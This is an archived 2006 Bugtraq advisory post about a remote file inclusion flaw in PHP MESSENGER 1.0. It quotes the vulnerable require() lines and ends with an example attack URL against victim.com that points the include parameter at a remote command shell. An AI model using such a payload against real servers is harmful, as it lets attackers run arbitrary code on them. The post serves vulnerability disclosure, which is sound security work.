lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060613172222.26966.qmail@securityfocus.com> Date: 13 Jun 2006 17:22:22 -0000 From: SpC-x@...mail.Org To: bugtraq@...urityfocus.com Subject: PHP MESSENGER 1.0 Version - Remote File Include Vulnerability # SaVSaK.CoM | SpC-x - The_BeKiR | # PHP MESSENGER 1.0 Version - Remote File Include Vulnerability # Risk : High # Class: Remote # Script : PHP MESSENGER # Credits : SpC-x # Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx # Code : # require ($path_to_php_messenger_script); # if (file_exists($path_to_php_conv_script)) require ($path_to_php_conv_script); # Vulnerable : # http://www.victim.com/PHP MESSENGER/php_messenger.php?path_to_php_conv_script=Command-Shell